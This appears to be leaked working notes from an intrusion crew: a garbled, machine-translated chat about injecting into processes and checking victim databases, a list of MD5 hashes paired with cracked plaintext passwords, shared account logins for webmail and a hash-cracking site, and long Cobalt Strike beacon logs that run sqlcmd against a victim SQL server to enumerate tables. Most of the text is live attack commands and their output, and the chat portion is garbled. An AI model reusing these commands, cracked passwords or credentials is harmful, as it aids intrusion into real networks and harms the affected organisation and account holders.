OnBaseTest
ksubscribers
kapps
KLCAuditReporting
OnBase
```
 
 ``AXSQL-PROD
```
AX2012_PROD
ProductVision_Live
ReportServer_AxLive
Remote Desktop Services
The system is not at all? take it out of the product database or it is not injected without explanations I do an inject - the process is extinguished but the processes are there[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=J7NX33FW8tXv2FFus) but how else do I know that there is an active scull spinning?but to watch everything and from winlogon worked just do not inject into them and do the processes need to be in the skuli that pulltl2 said there is a lot of trash, throw these shortly or tell me what's the matter trash from them cleaned the same readable i threw themtl2 asked to look tables certain there are kilometer messages i threw lists of databases from all servers readback?so what about the databases? just on them, and 4 more - the creeds did not come up only used in emergencies 6 pieces such as incorrectly configured ip, name, etc., right ... and what about it? says the wrong log or passa about esx i threw a picture there. what do you think?
88781646e2a2399370c54bae7f790e58 @d0nix
7259ade8efc785abb4043e171e06b9c6 300SpartanS
b4712f346339be917d4d9fe2ce3c387c barracuda
5acd3ae4a25e042cb01513ea9104b598 Barracuda
f97f8542534b19414d871e197d222747 Gutch@!!
960736ab56cfa8943d4de07ef142a730 boston
ae8e27dc85a2682037008ebe671655f0 afdljplw
b6c367027c0d73a755244ad52bda9a67 !nC0rr3ct
6c77565149af62e68bb41868d29ec47a d0n3g0n3
e9b57eb8af25befb91bda9b4ed95097c 11Saundra
a99a74eb78fc1f1ea3a89b53b7de7179 p@perm00n
b4712f346339be917d4d9fe2ce3c387c barracuda
4df7f5cc8377559b058c30516ca88a30 sub@sh2005
652805d304727fa73d6c4c7cfef31986 Calib3r9
5f6e5864d8622c481a233d9472f1b3a8 Gahann@

``Yeah, apparently it ran out of money...here it is нормjeremstew@gmx.com
1Qwerty1

you can also try this one if the previous "not ok" was not availablea long time ago with the password qwerthttps://cmg5.org
j.shoemaker@australiamail.com
1qwerty1

try it for a minute)davaltfu fuckin' davalyla like daval@tl2 and can we have an account on cmd5 - otherwise wait every time...``
beacon> shell sqlcmd -S 89.0.0.121,1433 -E -Q "use InsightEnt; exec sp_tables" -W
[*] Tasked beacon to run: sqlcmd -S 89.0.0.121,1433 -E -Q "use InsightEnt; exec sp_tables" -W
[+] host called home, sent: 98 bytes
[+] received output:
Changed database context to 'InsightEnt'.
TABLE_QUALIFIER TABLE_OWNER TABLE_NAME TABLE_TYPE
--------------- ----------- ---------- ---------- -------
InsightEnt dbo AuditTrail TABLE NULL
InsightEnt dbo Bookmarks TABLE NULL
InsightEnt dbo Cameras TABLE NULL
InsightEnt dbo CameraTemplates TABLE NULL
InsightEnt dbo CameraZones TABLE NULL
InsightEnt dbo ClientTask TABLE NULL
InsightEnt dbo ClientTaskQueue TABLE NULL
InsightEnt dbo ClientTaskReport TABLE NULL
InsightEnt dbo ContactInformation TABLE NULL
InsightEnt dbo Door TABLE NULL
InsightEnt dbo EventText TABLE NULL
InsightEnt dbo ExtendedProperties TABLE NULL
InsightEnt dbo FailOverControl TABLE NULL
InsightEnt dbo FM_FacilityMap TABLE NULL
InsightEnt dbo FM_FacilityMapItems TABLE NULL
InsightEnt dbo Layout TABLE NULL
InsightEnt dbo LayoutGroups TABLE NULL
InsightEnt dbo LayoutMapping TABLE NULL
InsightEnt dbo LicensePlateEvents TABLE NULL
InsightEnt dbo LicensePlateGroup TABLE NULL
InsightEnt dbo LicensePlateGrouping TABLE NULL
InsightEnt dbo LicensePlateMapping TABLE NULL
InsightEnt dbo LicensePlates TABLE NULL
InsightEnt dbo LiveView TABLE NULL
InsightEnt dbo Locations TABLE NULL
InsightEnt dbo NetworkDecoder TABLE NULL
InsightEnt dbo NVRs TABLE NULL
InsightEnt dbo PlugIn TABLE NULL
InsightEnt dbo PluginSettings TABLE NULL
InsightEnt dbo PTZCycle TABLE NULL
InsightEnt dbo PTZPriority TABLE NULL
InsightEnt dbo ResourceGroups TABLE NULL
InsightEnt dbo ResourceMapping TABLE NULL
InsightEnt dbo Servers TABLE NULL
InsightEnt dbo ServerStorage TABLE NULL
InsightEnt dbo System_Log TABLE NULL
InsightEnt dbo TaskAction TABLE NULL
InsightEnt dbo TaskCondition TABLE NULL
InsightEnt dbo TaskSchedule TABLE NULL
InsightEnt dbo UM_CustomerCamera TABLE NULL
InsightEnt dbo UM_Customers TABLE NULL
InsightEnt dbo UM_Groups TABLE NULL
InsightEnt dbo UM_Permissions TABLE NULL
InsightEnt dbo UM_UDefRes_Permissions TABLE NULL
InsightEnt dbo UM_UserAssignment TABLE NULL
InsightEnt dbo UM_Users TABLE NULL
InsightEnt dbo VCASettings TABLE NULL
InsightEnt dbo Version TABLE NULL
InsightEnt dbo VideoFiles TABLE NULL
InsightEnt dbo VideoFilesLog TABLE NULL
InsightEnt dbo VideoWall TABLE NULL
InsightEnt dbo VideoWallConfig TABLE NULL
InsightEnt dbo VideoWallMonitor TABLE NULL
InsightEnt dbo VideoWallRoaming TABLE NULL
InsightEnt dbo VITask TABLE NULL
InsightEnt dbo WA_Location TABLE NULL
InsightEnt dbo WA_Location_Server TABLE NULL
InsightEnt INFORMATION_SCHEMA CHECK_CONSTRAINTS VIEW NULL
InsightEnt INFORMATION_SCHEMA COLUMN_DOMAIN_USAGE VIEW NULL
InsightEnt INFORMATION_SCHEMA COLUMN_PRIVILEGES VIEW NULL
InsightEnt INFORMATION_SCHEMA COLUMNS VIEW NULL
InsightEnt INFORMATION_SCHEMA CONSTRAINT_COLUMN_USAGE VIEW NULL
InsightEnt INFORMATION_SCHEMA CONSTRAINT_TABLE_USAGE VIEW NULL
InsightEnt INFORMATION_SCHEMA DOMAIN_CONSTRAINTS VIEW NULL
InsightEnt INFORMATION_SCHEMA DOMAINS VIEW NULL
InsightEnt INFORMATION_SCHEMA KEY_COLUMN_USAGE VIEW NULL
InsightEnt INFORMATION_SCHEMA PARAMETERS VIEW NULL
InsightEnt INFORMATION_SCHEMA REFERENTIAL_CONSTRAINTS VIEW NULL
InsightEnt INFORMATION_SCHEMA ROUTINE_COLUMNS VIEW NULL
InsightEnt INFORMATION_SCHEMA ROUTINES VIEW NULL
InsightEnt INFORMATION_SCHEMA SCHEMATA VIEW NULL
InsightEnt INFORMATION_SCHEMA TABLE_CONSTRAINTS VIEW NULL
InsightEnt INFORMATION_SCHEMA TABLE_PRIVILEGES VIEW NULL
InsightEnt INFORMATION_SCHEMA TABLES VIEW NULL
InsightEnt INFORMATION_SCHEMA VIEW_COLUMN_USAGE VIEW NULL
InsightEnt INFORMATION_SCHEMA VIEW_TABLE_USAGE VIEW NULL
InsightEnt INFORMATION_SCHEMA VIEWS VIEW NULL
InsightEnt sys all_columns VIEW NULL
InsightEnt sys all_objects VIEW NULL
InsightEnt sys all_parameters VIEW NULL
InsightEnt sys all_sql_modules VIEW NULL
InsightEnt sys all_views VIEW NULL
InsightEnt sys allocation_units VIEW NULL
InsightEnt sys assemblies VIEW NULL
InsightEnt sys assembly_files VIEW NULL
InsightEnt sys assembly_modules VIEW NULL
InsightEnt sys assembly_references VIEW NULL
InsightEnt sys assembly_types VIEW NULL
InsightEnt sys asymmetric_keys VIEW NULL
InsightEnt sys backup_devices VIEW NULL
InsightEnt sys certificates VIEW NULL
InsightEnt sys change_tracking_databases VIEW NULL
InsightEnt sys change_tracking_tables VIEW NULL
InsightEnt sys check_constraints VIEW NULL
InsightEnt sys column_type_usages VIEW NULL
InsightEnt sys column_xml_schema_collection_usages VIEW NULL
InsightEnt sys columns VIEW NULL
InsightEnt sys computed_columns VIEW NULL
InsightEnt sys configurations VIEW NULL
InsightEnt sys conversation_endpoints VIEW NULL
InsightEnt sys conversation_groups VIEW NULL
InsightEnt sys conversation_priorities VIEW NULL
InsightEnt sys credentials VIEW NULL
InsightEnt sys crypt_properties VIEW NULL
InsightEnt sys cryptographic_providers VIEW NULL
InsightEnt sys data_spaces VIEW NULL
InsightEnt sys database_audit_specification_details VIEW NULL
InsightEnt sys database_audit_specifications VIEW NULL
InsightEnt sys database_files VIEW NULL
InsightEnt sys database_mirroring VIEW NULL
InsightEnt sys database_mirroring_endpoints VIEW NULL
InsightEnt sys database_mirroring_witnesses VIEW NULL
InsightEnt sys database_permissions VIEW NULL
InsightEnt sys database_principal_aliases VIEW NULL
InsightEnt sys database_principal_aliases VIEW NULL
InsightEnt sys database_recovery_status VIEW NULL
InsightEnt sys database_role_members VIEW NULL
InsightEnt sys databases VIEW NULL
InsightEnt sys default_constraints VIEW NULL
InsightEnt sys destination_data_spaces VIEW NULL
InsightEnt sys dm_audit_actions VIEW NULL
InsightEnt sys dm_audit_class_type_map VIEW NULL
InsightEnt sys dm_broker_activated_tasks VIEW NULL
InsightEnt sys dm_broker_connections VIEW NULL
InsightEnt sys dm_broker_forwarded_messages VIEW NULL
InsightEnt sys dm_broker_queue_monitors VIEW NULL
InsightEnt sys dm_cdc_errors VIEW NULL
InsightEnt sys dm_cdc_log_scan_sessions VIEW NULL
InsightEnt sys dm_clr_appdomains VIEW NULL
InsightEnt sys dm_clr_loaded_assemblies VIEW NULL
InsightEnt sys dm_clr_properties VIEW NULL
InsightEnt sys dm_clr_tasks VIEW NULL
InsightEnt sys dm_cryptographic_provider_properties VIEW NULL
InsightEnt sys dm_database_encryption_keys VIEW NULL
InsightEnt sys dm_db_file_space_usage VIEW NULL
InsightEnt sys dm_db_index_usage_stats VIEW NULL
InsightEnt sys dm_db_mirroring_auto_page_repair VIEW NULL
InsightEnt sys dm_db_mirroring_connections VIEW NULL
InsightEnt sys dm_db_mirroring_past_actions VIEW NULL
InsightEnt sys dm_db_missing_index_details VIEW NULL
InsightEnt sys dm_db_missing_index_group_stats VIEW NULL
InsightEnt sys dm_db_missing_index_groups VIEW NULL
InsightEnt sys dm_db_partition_stats VIEW NULL
InsightEnt sys dm_db_persisted_sku_features VIEW NULL
InsightEnt sys dm_db_script_level VIEW NULL
InsightEnt sys dm_db_session_space_usage VIEW NULL
InsightEnt sys dm_db_task_space_usage VIEW NULL
InsightEnt sys dm_exec_background_job_queue VIEW NULL
InsightEnt sys dm_exec_background_job_queue_stats VIEW NULL
InsightEnt sys dm_exec_cached_plans VIEW NULL
InsightEnt sys dm_exec_connections VIEW NULL
InsightEnt sys dm_exec_procedure_stats VIEW NULL
InsightEnt sys dm_exec_query_memory_grants VIEW NULL
InsightEnt sys dm_exec_query_optimizer_info VIEW NULL
InsightEnt sys dm_exec_query_resource_semaphores VIEW NULL
InsightEnt sys dm_exec_query_stats VIEW NULL
InsightEnt sys dm_exec_query_transformation_stats VIEW NULL
InsightEnt sys dm_exec_requests VIEW NULL
InsightEnt sys dm_exec_sessions VIEW NULL
InsightEnt sys dm_exec_trigger_stats VIEW NULL
InsightEnt sys dm_filestream_file_io_handles VIEW NULL
InsightEnt sys dm_filestream_file_io_requests VIEW NULL
InsightEnt sys dm_fts_active_catalogs VIEW NULL
InsightEnt sys dm_fts_fdhosts VIEW NULL
InsightEnt sys dm_fts_index_population VIEW NULL
InsightEnt sys dm_fts_memory_buffers VIEW NULL
InsightEnt sys dm_fts_memory_pools VIEW NULL
InsightEnt sys dm_fts_outstanding_batches VIEW NULL
InsightEnt sys dm_fts_population_ranges VIEW NULL
InsightEnt sys dm_io_backup_tapes VIEW NULL
InsightEnt sys dm_io_cluster_shared_drives VIEW NULL
InsightEnt sys dm_io_pending_io_requests VIEW NULL
InsightEnt sys dm_os_buffer_descriptors VIEW NULL
InsightEnt sys dm_os_child_instances VIEW NULL
InsightEnt sys dm_os_cluster_nodes VIEW NULL
InsightEnt sys dm_os_dispatcher_pools VIEW NULL
InsightEnt sys dm_os_dispatchers VIEW NULL
InsightEnt sys dm_os_hosts VIEW NULL
InsightEnt sys dm_os_latch_stats VIEW NULL
InsightEnt sys dm_os_loaded_modules VIEW NULL
InsightEnt sys dm_os_memory_allocations VIEW NULL
InsightEnt sys dm_os_memory_brokers VIEW NULL
InsightEnt sys dm_os_memory_cache_clock_hands VIEW NULL
InsightEnt sys dm_os_memory_cache_counters VIEW NULL
InsightEnt sys dm_os_memory_cache_entries VIEW NULL
InsightEnt sys dm_os_memory_cache_hash_tables VIEW NULL
InsightEnt sys dm_os_memory_clerks VIEW NULL
InsightEnt sys dm_os_memory_node_access_stats VIEW NULL
InsightEnt sys dm_os_memory_nodes VIEW NULL
InsightEnt sys dm_os_memory_objects VIEW NULL
InsightEnt sys dm_os_memory_pools VIEW NULL
InsightEnt sys dm_os_nodes VIEW NULL
InsightEnt sys dm_os_performance_counters VIEW NULL
InsightEnt sys dm_os_process_memory VIEW NULL
InsightEnt sys dm_os_ring_buffers VIEW NULL
InsightEnt sys dm_os_schedulers VIEW NULL
InsightEnt sys dm_os_spinlock_stats VIEW NULL
InsightEnt sys dm_os_stacks VIEW NULL
InsightEnt sys dm_os_sublatches VIEW NULL
InsightEnt sys dm_os_sys_info VIEW NULL
InsightEnt sys dm_os_sys_memory VIEW NULL
InsightEnt sys dm_os_tasks VIEW NULL
InsightEnt sys dm_os_threads VIEW NULL
InsightEnt sys dm_os_virtual_address_dump VIEW NULL
InsightEnt sys dm_os_wait_stats VIEW NULL
InsightEnt sys dm_os_waiting_tasks VIEW NULL
InsightEnt sys dm_os_windows_info VIEW NULL
InsightEnt sys dm_os_worker_local_storage VIEW NULL
InsightEnt sys dm_os_workers VIEW NULL
InsightEnt sys dm_qn_subscriptions VIEW NULL
InsightEnt sys dm_repl_articles VIEW NULL
InsightEnt sys dm_repl_schemas VIEW NULL
InsightEnt sys dm_repl_tranhash VIEW NULL
InsightEnt sys dm_repl_traninfo VIEW NULL
InsightEnt sys dm_resource_governor_configuration VIEW NULL
InsightEnt sys dm_resource_governor_resource_pools VIEW NULL
InsightEnt sys dm_resource_governor_workload_groups VIEW NULL
InsightEnt sys dm_server_audit_status VIEW NULL
InsightEnt sys dm_server_memory_dumps VIEW NULL
InsightEnt sys dm_server_registry VIEW NULL
InsightEnt sys dm_server_services VIEW NULL
InsightEnt sys dm_tran_active_snapshot_database_transactions VIEW NULL
InsightEnt sys dm_tran_active_transactions VIEW NULL
InsightEnt sys dm_tran_commit_table VIEW NULL
InsightEnt sys dm_tran_current_snapshot VIEW NULL
InsightEnt sys dm_tran_current_transaction VIEW NULL
InsightEnt sys dm_tran_database_transactions VIEW NULL
InsightEnt sys dm_tran_locks VIEW NULL
InsightEnt sys dm_tran_session_transactions VIEW NULL
InsightEnt sys dm_tran_top_version_generators VIEW NULL
InsightEnt sys dm_tran_transactions_snapshot VIEW NULL
InsightEnt sys dm_tran_version_store VIEW NULL
InsightEnt sys dm_xe_map_values VIEW NULL
InsightEnt sys dm_xe_object_columns VIEW NULL
InsightEnt sys dm_xe_objects VIEW NULL
InsightEnt sys dm_xe_packages VIEW NULL
InsightEnt sys dm_xe_session_event_actions VIEW NULL
InsightEnt sys dm_xe_session_events VIEW NULL
InsightEnt sys dm_xe_session_object_columns VIEW NULL
InsightEnt sys dm_xe_session_targets VIEW NULL
InsightEnt sys dm_xe_sessions VIEW NULL
InsightEnt sys endpoint_webmethods VIEW NULL
InsightEnt sys endpoints VIEW NULL
InsightEnt sys event_notification_event_types VIEW NULL
InsightEnt sys event_notifications VIEW NULL
InsightEnt sys events VIEW NULL
InsightEnt sys extended_procedures VIEW NULL
InsightEnt sys extended_properties VIEW NULL
InsightEnt sys filegroups VIEW NULL
InsightEnt sys foreign_key_columns VIEW NULL
InsightEnt sys foreign_keys VIEW NULL
InsightEnt sys fulltext_catalogs VIEW NULL
InsightEnt sys fulltext_document_types VIEW NULL
InsightEnt sys fulltext_index_catalog_usages VIEW NULL
InsightEnt sys fulltext_index_columns VIEW NULL
InsightEnt sys fulltext_index_fragments VIEW NULL
InsightEnt sys fulltext_index_indexes VIEW NULL
InsightEnt sys fulltext_languages VIEW NULL
InsightEnt sys fulltext_stoplists VIEW NULL
InsightEnt sys fulltext_stopwords VIEW NULL
InsightEnt sys fulltext_system_stopwords VIEW NULL
InsightEnt sys function_order_columns VIEW NULL
InsightEnt sys http_endpoints VIEW NULL
InsightEnt sys identity_columns VIEW NULL
InsightEnt sys index_columns VIEW NULL
InsightEnt sys indexes VIEW NULL
InsightEnt sys internal_tables VIEW NULL
InsightEnt sys key_constraints VIEW NULL
InsightEnt sys key_encryptions VIEW NULL
InsightEnt sys linked_logins VIEW NULL
InsightEnt sys login_token VIEW NULL
InsightEnt sys master_files VIEW NULL
InsightEnt sys master_key_passwords VIEW NULL
InsightEnt sys message_type_xml_schema_collection_usages VIEW NULL
InsightEnt sys messages VIEW NULL
InsightEnt sys module_assembly_usages VIEW NULL
InsightEnt sys numbered_procedure_parameters VIEW NULL
InsightEnt sys numbered_procedures VIEW NULL
InsightEnt sys objects VIEW NULL
InsightEnt sys openkeys VIEW NULL
InsightEnt sys parameter_type_usages VIEW NULL
InsightEnt sys parameter_xml_schema_collection_usages VIEW NULL
InsightEnt sys parameters VIEW NULL
InsightEnt sys partition_functions VIEW NULL
InsightEnt sys partition_parameters VIEW NULL
InsightEnt sys partition_range_values VIEW NULL
InsightEnt sys partition_schemes VIEW NULL
InsightEnt sys partitions VIEW NULL
InsightEnt sys plan_guides VIEW NULL
InsightEnt sys procedures VIEW NULL
InsightEnt sys remote_logins VIEW NULL
InsightEnt sys remote_service_bindings VIEW NULL
InsightEnt sys resource_governor_configuration VIEW NULL
InsightEnt sys resource_governor_resource_pools VIEW NULL
InsightEnt sys resource_governor_workload_groups VIEW NULL
InsightEnt sys routes VIEW NULL
InsightEnt sys schemas VIEW NULL
InsightEnt sys securable_classes VIEW NULL
InsightEnt sys server_assembly_modules VIEW NULL
InsightEnt sys server_audit_specification_details VIEW NULL
InsightEnt sys server_audit_specifications VIEW NULL
InsightEnt sys server_audits VIEW NULL
InsightEnt sys server_event_notifications VIEW NULL
InsightEnt sys server_event_session_actions VIEW NULL
InsightEnt sys server_event_session_events VIEW NULL
InsightEnt sys server_event_session_fields VIEW NULL
InsightEnt sys server_event_session_targets VIEW NULL
InsightEnt sys server_event_sessions VIEW NULL
InsightEnt sys server_events VIEW NULL
InsightEnt sys server_file_audits VIEW NULL
InsightEnt sys server_permissions VIEW NULL
InsightEnt sys server_principal_credentials VIEW NULL
InsightEnt sys server_principals VIEW NULL
InsightEnt sys server_role_members VIEW NULL
InsightEnt sys server_sql_modules VIEW NULL
InsightEnt sys server_trigger_events VIEW NULL
InsightEnt sys server_triggers VIEW NULL
InsightEnt sys servers VIEW NULL
InsightEnt sys service_broker_endpoints VIEW NULL
InsightEnt sys service_contract_message_usages VIEW NULL
InsightEnt sys service_contract_usages VIEW NULL
InsightEnt sys service_contracts VIEW NULL
InsightEnt sys service_message_types VIEW NULL
InsightEnt sys service_queue_usages VIEW NULL
InsightEnt sys service_queues VIEW NULL
InsightEnt sys services VIEW NULL
InsightEnt sys soap_endpoints VIEW NULL
InsightEnt sys spatial_index_tessellations VIEW NULL
InsightEnt sys spatial_indexes VIEW NULL
InsightEnt sys spatial_reference_systems VIEW NULL
InsightEnt sys sql_dependencies VIEW NULL
InsightEnt sys sql_expression_dependencies VIEW NULL
InsightEnt sys sql_logins VIEW NULL
InsightEnt sys sql_modules VIEW NULL
InsightEnt sys stats VIEW NULL
InsightEnt sys stats_columns VIEW NULL
InsightEnt sys symmetric_keys VIEW NULL
InsightEnt sys synonyms VIEW NULL
InsightEnt sys sysaltfiles VIEW NULL
InsightEnt sys syscacheobjects VIEW NULL
InsightEnt sys syscharsets VIEW NULL
InsightEnt sys syscolumns VIEW NULL
InsightEnt sys syscomments VIEW NULL
InsightEnt sysconfigures VIEW NULL
InsightEnt sysconstraints VIEW NULL
InsightEnt sys syscurconfigs VIEW NULL
InsightEnt sys syscursorcolumns VIEW NULL
InsightEnt sys syscursorrefs VIEW NULL
InsightEnt sys syscursors VIEW NULL
InsightEnt sys syscursortables VIEW NULL
InsightEnt sysdatabases VIEW NULL
InsightEnt sysdepends VIEW NULL
InsightEnt sysdevices VIEW NULL
InsightEnt sys sysfilegroups VIEW NULL
InsightEnt sys sysfiles VIEW NULL
InsightEnt sys sysforeignkeys VIEW NULL
InsightEnt sys sysfulltextcatalogs VIEW NULL
InsightEnt sys sysindexes VIEW NULL
InsightEnt sys sysindexkeys VIEW NULL
InsightEnt sys syslanguages VIEW NULL
InsightEnt sys syslockinfo VIEW NULL
InsightEnt sys syslogins VIEW NULL
InsightEnt sys sysmembers VIEW NULL
InsightEnt sys sysmessages VIEW NULL
InsightEnt sys sysobjects VIEW NULL
InsightEnt sys sysoledbusers VIEW NULL
InsightEnt sys sysopentapes VIEW NULL
InsightEnt sys sysperfinfo VIEW NULL
InsightEnt sys syspermissions VIEW NULL
InsightEnt sys sysprocesses VIEW NULL
InsightEnt sys sysprotects VIEW NULL
InsightEnt sys sysreferences VIEW NULL
InsightEnt sysremotelogins VIEW NULL
InsightEnt syss sysservers VIEW NULL
InsightEnt sys system_columns VIEW NULL
InsightEnt sys system_components_surface_area_configuration VIEW NULL
InsightEnt sys system_internals_allocation_units VIEW NULL
InsightEnt sys system_internals_partition_columns VIEW NULL
InsightEnt sys system_internals_partitions VIEW NULL
InsightEnt sys system_objects VIEW NULL
InsightEnt sys system_parameters VIEW NULL
InsightEnt sys system_sql_modules VIEW NULL
InsightEnt sys system_views VIEW NULL
InsightEnt sys systypes VIEW NULL
InsightEnt sys sysusers VIEW NULL
InsightEnt sys table_types VIEW NULL
InsightEnt sys tables VIEW NULL
InsightEnt sys tcp_endpoints VIEW NULL
InsightEnt sys trace_categories VIEW NULL
InsightEnt sys trace_columns VIEW NULL
InsightEnt sys trace_event_bindings VIEW NULL
InsightEnt sys trace_events VIEW NULL
InsightEnt sys trace_subclass_values VIEW NULL
InsightEnt sys traces VIEW NULL
InsightEnt sys transmission_queue VIEW NULL
InsightEnt sys trigger_event_types VIEW NULL
InsightEnt sys trigger_events VIEW NULL
InsightEnt sys triggers VIEW NULL
InsightEnt sys type_assembly_usages VIEW NULL
InsightEnt sys types VIEW NULL
InsightEnt sys user_token VIEW NULL
InsightEnt sys via_endpoints VIEW NULL
InsightEnt sys views VIEW NULL
InsightEnt sys xml_indexes VIEW NULL
InsightEnt sys xml_schema_attributes VIEW NULL
InsightEnt sys xml_schema_collections VIEW NULL
InsightEnt sys xml_schema_component_placements VIEW NULL
InsightEnt sys xml_schema_components VIEW NULL
InsightEnt sys xml_schema_elements VIEW NULL
InsightEnt sys xml_schema_facets VIEW NULL
InsightEnt sys xml_schema_model_groups VIEW NULL
InsightEnt sys xml_schema_namespaces VIEW NULL
InsightEnt sys xml_schema_types VIEW NULL
InsightEnt sys xml_schema_wildcard_namespaces VIEW NULL
InsightEnt sys xml_schema_wildcards VIEW NULL

(415 rows affected)
```
 
```
beacon> shell sqlcmd -S 89.0.0.121,1433 -E -Q "use Intermec; exec sp_tables" -W
[*] Tasked beacon to run: sqlcmd -S 89.0.0.121,1433 -E -Q "use Intermec; exec sp_tables" -W
[+] host called home, sent: 96 bytes
[+] received output:
Changed database context to 'Intermec'.
TABLE_QUALIFIER TABLE_OWNER TABLE_NAME TABLE_TYPE
--------------- ----------- ---------- ---------- -------
Intermec INFORMATION_SCHEMA CHECK_CONSTRAINTS VIEW NULL
Intermec INFORMATION_SCHEMA COLUMN_DOMAIN_USAGE VIEW NULL
Intermec INFORMATION_SCHEMA COLUMN_PRIVILEGES VIEW NULL
Intermec INFORMATION_SCHEMA COLUMNS VIEW NULL
Intermec INFORMATION_SCHEMA CONSTRAINT_COLUMN_USAGE VIEW NULL
Intermec INFORMATION_SCHEMA CONSTRAINT_TABLE_USAGE VIEW NULL
Intermec INFORMATION_SCHEMA DOMAIN_CONSTRAINTS VIEW NULL
Intermec INFORMATION_SCHEMA DOMAINS VIEW NULL
Intermec INFORMATION_SCHEMA KEY_COLUMN_USAGE VIEW NULL
Intermec INFORMATION_SCHEMA PARAMETERS VIEW NULL
Intermec INFORMATION_SCHEMA REFERENTIAL_CONSTRAINTS VIEW NULL
Intermec INFORMATION_SCHEMA ROUTINE_COLUMNS VIEW NULL
Intermec INFORMATION_SCHEMA ROUTINES VIEW NULL
Intermec INFORMATION_SCHEMA SCHEMATA VIEW NULL
Intermec INFORMATION_SCHEMA TABLE_CONSTRAINTS VIEW NULL
Intermec INFORMATION_SCHEMA TABLE_PRIVILEGES VIEW NULL
Intermec INFORMATION_SCHEMA TABLES VIEW NULL
Intermec INFORMATION_SCHEMA VIEW_COLUMN_USAGE VIEW NULL
Intermec INFORMATION_SCHEMA VIEW_TABLE_USAGE VIEW NULL
Intermec INFORMATION_SCHEMA VIEWS VIEW NULL
Intermec sys all_columns VIEW NULL
Intermec sys all_objects VIEW NULL
Intermec sys all_parameters VIEW NULL
Intermec sys all_sql_modules VIEW NULL
Intermec sys all_views VIEW NULL
Intermec sys allocation_units VIEW NULL
Intermec sys assemblies VIEW NULL
Intermec sys assembly_files VIEW NULL
Intermec sys assembly_modules VIEW NULL
Intermec sys assembly_references VIEW NULL
Intermec sys assembly_types VIEW NULL
Intermec sys asymmetric_keys VIEW NULL
Intermec sys backup_devices VIEW NULL
Intermec sys certificates VIEW NULL
Intermec sys change_tracking_databases VIEW NULL
Intermec sys change_tracking_tables VIEW NULL
Intermec sys check_constraints VIEW NULL
Intermec sys column_type_usages VIEW NULL
Intermec sys column_xml_schema_collection_usages VIEW NULL
Intermec sys columns VIEW NULL
Intermec sys computed_columns VIEW NULL
Intermec sys configurations VIEW NULL
Intermec sys conversation_endpoints VIEW NULL
Intermec sys conversation_groups VIEW NULL
Intermec sys conversation_priorities VIEW NULL
Intermec sys credentials VIEW NULL
Intermec sys crypt_properties VIEW NULL
Intermec sys cryptographic_providers VIEW NULL
Intermec sys data_spaces VIEW NULL
Intermec sys database_audit_specification_details VIEW NULL
Intermec sys database_audit_specifications VIEW NULL
Intermec sys database_files VIEW NULL
Intermec sys database_mirroring VIEW NULL
Intermec sys database_mirroring_endpoints VIEW NULL
Intermec sys database_mirroring_witnesses VIEW NULL
Intermec sys database_permissions VIEW NULL
Intermec sys database_principal_aliases VIEW NULL
Intermec sys database_principal_aliases VIEW NULL
Intermec sys database_recovery_status VIEW NULL
Intermec sys database_role_members VIEW NULL
Intermec sys databases VIEW NULL
Intermec sys default_constraints VIEW NULL
Intermec sys destination_data_spaces VIEW NULL
Intermec sys dm_audit_actions VIEW NULL
Intermec sys dm_audit_class_type_map VIEW NULL
Intermec sys dm_broker_activated_tasks VIEW NULL
Intermec sys dm_broker_connections VIEW NULL
Intermec sys dm_broker_forwarded_messages VIEW NULL
Intermec sys dm_broker_queue_monitors VIEW NULL
Intermec sys dm_cdc_errors VIEW NULL
Intermec sys dm_cdc_log_scan_sessions VIEW NULL
Intermec sys dm_clr_appdomains VIEW NULL
Intermec sys dm_clr_loaded_assemblies VIEW NULL
Intermec sys dm_clr_properties VIEW NULL
Intermec sys dm_clr_tasks VIEW NULL
Intermec sys dm_cryptographic_provider_properties VIEW NULL
Intermec sys dm_database_encryption_keys VIEW NULL
Intermec sys dm_db_file_space_usage VIEW NULL
Intermec sys dm_db_index_usage_stats VIEW NULL
Intermec sys dm_db_mirroring_auto_page_repair VIEW NULL
Intermec sys dm_db_mirroring_connections VIEW NULL
Intermec sys dm_db_mirroring_past_actions VIEW NULL
Intermec sys dm_db_missing_index_details VIEW NULL
Intermec sys dm_db_missing_index_group_stats VIEW NULL
Intermec sys dm_db_missing_index_groups VIEW NULL
Intermec sys dm_db_partition_stats VIEW NULL
Intermec sys dm_db_persisted_sku_features VIEW NULL
Intermec sys dm_db_script_level VIEW NULL
Intermec sys dm_db_session_space_usage VIEW NULL
Intermec sys dm_db_task_space_usage VIEW NULL
Intermec sys dm_exec_background_job_queue VIEW NULL
Intermec sys dm_exec_background_job_queue_stats VIEW NULL
Intermec sys dm_exec_cached_plans VIEW NULL
Intermec sys dm_exec_connections VIEW NULL
Intermec sys dm_exec_procedure_stats VIEW NULL
Intermec sys dm_exec_query_memory_grants VIEW NULL
Intermec sys dm_exec_query_optimizer_info VIEW NULL
Intermec sys dm_exec_query_resource_semaphores VIEW NULL
Intermec sys dm_exec_query_stats VIEW NULL
Intermec sys dm_exec_query_transformation_stats VIEW NULL
Intermec sys dm_exec_requests VIEW NULL
Intermec sys dm_exec_sessions VIEW NULL
Intermec sys dm_exec_trigger_stats VIEW NULL
Intermec sys dm_filestream_file_io_handles VIEW NULL
Intermec sys dm_filestream_file_io_requests VIEW NULL
Intermec sys dm_fts_active_catalogs VIEW NULL
Intermec sys dm_fts_fdhosts VIEW NULL
Intermec sys dm_fts_index_population VIEW NULL
Intermec sys dm_fts_memory_buffers VIEW NULL
Intermec sys dm_fts_memory_pools VIEW NULL
Intermec sys dm_fts_outstanding_batches VIEW NULL
Intermec sys dm_fts_population_ranges VIEW NULL
Intermec sys dm_io_backup_tapes VIEW NULL
Intermec sys dm_io_cluster_shared_drives VIEW NULL
Intermec sys dm_io_pending_io_requests VIEW NULL
Intermec sys dm_os_buffer_descriptors VIEW NULL
Intermec sys dm_os_child_instances VIEW NULL
Intermec sys dm_os_cluster_nodes VIEW NULL
Intermec sys dm_os_dispatcher_pools VIEW NULL
Intermec sys dm_os_dispatchers VIEW NULL
Intermec sys dm_os_hosts VIEW NULL
Intermec sys dm_os_latch_stats VIEW NULL
Intermec sys dm_os_loaded_modules VIEW NULL
Intermec sys dm_os_memory_allocations VIEW NULL
Intermec sys dm_os_memory_brokers VIEW NULL
Intermec sys dm_os_memory_cache_clock_hands VIEW NULL
Intermec sys dm_os_memory_cache_counters VIEW NULL
Intermec sys dm_os_memory_cache_entries VIEW NULL
Intermec sys dm_os_memory_cache_hash_tables VIEW NULL
Intermec sys dm_os_memory_clerks VIEW NULL
Intermec sys dm_os_memory_node_access_stats VIEW NULL
Intermec sys dm_os_memory_nodes VIEW NULL
Intermec sys dm_os_memory_objects VIEW NULL
